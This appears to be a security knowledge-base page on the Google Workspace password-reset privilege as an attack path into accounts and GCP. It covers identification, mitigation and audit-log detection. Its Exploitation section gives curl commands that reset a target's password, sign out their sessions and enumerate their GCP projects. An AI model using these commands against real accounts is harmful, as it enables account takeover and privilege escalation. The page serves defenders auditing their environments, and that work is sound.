GWS_RESET_PASSWORD

Summary

FSProtect ACL Alias

GWS_RESET_PASSWORD

GCP Alias

Persistence & Impersonation

Affected Object Types

Users

Exploitation Certainty

Certain

Granting Roles

Google Workspace Super Admin, User Management Admin, Help Desk Admin

Description

GWS_RESET_PASSWORD indicates that a Google Workspace identity can reset another user's password via the Admin Console or Admin SDK. Password reset is one of the most direct account takeover vectors in a Workspace environment — the attacker sets a new password, logs in as the target user, and gains access to all their Google services.

Because Google Workspace identities are commonly used as the SSO provider for third-party SaaS applications, compromising a Workspace account can cascade to any downstream service that trusts Google sign-in. If the target user is a GCP project owner or has the GCP Console bookmarked, this edge leads directly into GCP.

Key abuse scenarios:

Reset a user's password → log in as that user → access Gmail, Drive, GCP Console.
Reset a GCP project owner's password → access all projects and service accounts the user manages.
Reset a Super Admin's password → take over the entire Workspace organization.

Identification

GCP Console

Open Google Admin Console (admin.google.com) → Account → Admin roles.
Identify roles with the Reset User Passwords privilege: Super Admin, User Management Admin, Help Desk Admin.
Review who holds each of these roles under the Admins tab.

gcloud CLI

# List all admin roles with password reset privileges (Access token should be authorized on scope: https://www.googleapis.com/auth/admin.directory.rolemanagement.readonly)
ACCESS_TOKEN="your-access-token"
curl -s \
  -H "Authorization: Bearer $ACCESS_TOKEN" \
  "https://admin.googleapis.com/admin/directory/v1/customer/my_customer/roles" \
  | jq '.items[]? | select(.rolePrivileges[].privilegeName == "RESET_USER_PASSWORD") | {roleId: .roleId, roleName: .roleName}'

Exploitation

gcloud CLI

# Access token should be authorized on scope: ttps://www.googleapis.com/auth/admin.directory.user
ACCESS_TOKEN="your-access-token"
TARGET_USER="[email protected]"

# Reset the target user's password
curl -s -X PUT \
  -H "Authorization: Bearer $ACCESS_TOKEN" \
  -H "Content-Type: application/json" \
  -d '{"password": "NewP@ssw0rd123!", "changePasswordAtNextLogin": false}' \
  "https://admin.googleapis.com/admin/directory/v1/users/${TARGET_USER}"

# Revoke all active sessions to force re-authentication with the new password
curl -s -X POST \
  -H "Authorization: Bearer $ACCESS_TOKEN" \
  "https://admin.googleapis.com/admin/directory/v1/users/${TARGET_USER}/signOut"

After resetting the password, sign in as the target user and enumerate GCP access:

# Authenticate to GCP as the compromised user
gcloud auth login  # sign in with the target user's credentials

# Enumerate GCP projects the user has access to
gcloud projects list

# List service accounts in a target project
gcloud iam service-accounts list --project=<project-id>

Compound path: GWS_RESET_PASSWORD → reset password of a GCP project Owner → log in as that user → enumerate and access all resources in the project, including creating SA keys or modifying IAM policy.

Mitigation

Enforce phishing-resistant MFA (passkeys/security keys) — a password reset alone is insufficient to log in if strong MFA is required.
Restrict password reset rights to dedicated Help Desk accounts; never allow delegated admins to reset Super Admin passwords.
Alert on admin-initiated password resets in real-time via Admin Console audit log alerts.
Scope Help Desk Admin to specific OUs rather than the entire organization.

Detection

Log Type

Method

Key Fields

Admin Activity

CHANGE_PASSWORD

Admin audit log, USER_EMAIL, ADMIN_EMAIL

# Access token should be authorized on scope: https://www.googleapis.com/auth/admin.reports.audit.readonly
ACCESS_TOKEN="your-access-token"
curl -s \
  -H "Authorization: Bearer $ACCESS_TOKEN" \
  "https://admin.googleapis.com/admin/reports/v1/activity/users/all/applications/admin?eventName=CHANGE_PASSWORD" \
  | jq '.items[]? | {actor: .actor.email, target: (.events[].parameters[] | select(.name=="USER_EMAIL") | .value), time: .id.time}'

Alert on:

Admin-initiated password resets on Super Admin or GCP-privileged accounts.
Password resets outside business hours or from unexpected admin accounts.
Sign-ins from new devices or locations occurring shortly after a password reset.

References

https://knowledge.workspace.google.com/admin/users/reset-a-users-password
https://developers.google.com/admin-sdk/directory/v1/guides/manage-users

PreviousGWS_IN_GROUP

Last updated 7 days ago

Was this helpful?